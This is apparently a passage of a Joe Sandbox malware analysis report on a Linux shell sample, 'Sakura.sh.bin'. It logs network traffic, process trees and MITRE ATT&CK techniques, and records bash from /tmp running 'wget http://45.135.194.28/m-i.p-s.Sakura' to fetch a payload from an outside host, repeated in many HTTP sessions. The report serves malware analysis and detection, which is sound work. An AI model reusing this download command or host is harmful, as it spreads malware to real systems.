Mar 18, 2025 13:46:44.222104073 CET	80	49502	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:45.890355110 CET	80	49502	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:45.890763044 CET	49502	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:45.893712044 CET	49502	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:45.898313999 CET	80	49502	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:55.902343988 CET	49504	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:55.907172918 CET	80	49504	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:55.907241106 CET	49504	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:55.909825087 CET	49504	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:55.914470911 CET	80	49504	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:57.545725107 CET	80	49504	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:57.548557043 CET	49504	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:57.553273916 CET	80	49504	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:07.553596020 CET	49506	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:07.558501959 CET	80	49506	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:07.558579922 CET	49506	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:07.560295105 CET	49506	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:07.564977884 CET	80	49506	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:09.201998949 CET	80	49506	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:09.203457117 CET	49506	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:09.204212904 CET	49506	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:09.208916903 CET	80	49506	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:19.208537102 CET	49508	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:19.214021921 CET	80	49508	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:19.214099884 CET	49508	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:19.216412067 CET	49508	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:19.222048998 CET	80	49508	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:20.857976913 CET	80	49508	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:20.859791040 CET	49508	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:20.864547968 CET	80	49508	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:30.866966009 CET	49510	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:30.873541117 CET	80	49510	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:30.873625994 CET	49510	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:30.875355005 CET	49510	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:30.880125999 CET	80	49510	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:32.524147034 CET	80	49510	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:32.526623011 CET	49510	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:32.532169104 CET	80	49510	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:42.532898903 CET	49512	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:42.537586927 CET	80	49512	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:42.537702084 CET	49512	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:42.540714025 CET	49512	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:42.545356035 CET	80	49512	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:44.186379910 CET	80	49512	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:44.186661959 CET	49512	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:44.189742088 CET	49512	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:44.194365025 CET	80	49512	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:54.194259882 CET	49514	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:54.198968887 CET	80	49514	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:54.199090004 CET	49514	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:54.200650930 CET	49514	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:54.205322027 CET	80	49514	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:55.847593069 CET	80	49514	45.135.194.28	192.168.2.23
Mar 18, 2025 13:47:55.849862099 CET	49514	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:47:55.854636908 CET	80	49514	45.135.194.28	192.168.2.23

HTTP Request Dependency Graph

45.135.194.28

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	49484	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:45:44.270634890 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	49486	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:45:46.947782993 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.23	49488	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:45:50.623742104 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.23	49490	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:45:55.296960115 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.23	49492	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:00.951803923 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.23	49494	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:07.629508972 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.23	49496	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:15.281068087 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.23	49498	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:23.917514086 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.23	49500	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:33.562036037 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.23	49502	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:44.217370987 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.23	49504	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:46:55.909825087 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.23	49506	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:47:07.560295105 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.23	49508	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:47:19.216412067 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.23	49510	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:47:30.875355005 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.23	49512	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:47:42.540714025 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.23	49514	45.135.194.28	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2025 13:47:54.200650930 CET	166	OUT	GET /m-i.p-s.Sakura HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 45.135.194.28 Connection: Keep-Alive

System Behavior

Analysis Process: bash PID: 6213, Parent PID: 6126

General

Start time (UTC):	12:45:43
Start date (UTC):	18/03/2025
Path:	/usr/bin/bash
Arguments:	/usr/bin/bash /tmp/Sakura.sh.bin
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

File Activities

File Opened

File Read

Process Activities

Process Forked

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: bash PID: 6214, Parent PID: 6213

General

Start time (UTC):	12:45:43
Start date (UTC):	18/03/2025
Path:	/usr/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: wget PID: 6214, Parent PID: 6213

General

Start time (UTC):	12:45:43
Start date (UTC):	18/03/2025
Path:	/usr/bin/wget
Arguments:	wget http://45.135.194.28/m-i.p-s.Sakura
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report Sakura.sh.bin

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: bash PID: 6213, Parent PID: 6126

General

File Activities

File Opened

File Read

Process Activities

Process Forked

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: bash PID: 6214, Parent PID: 6213

General

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: wget PID: 6214, Parent PID: 6213

General

File Activities

File Opened

File Read

Process Activities

Thread Sleep

Network Activities

Linux Analysis Report
Sakura.sh.bin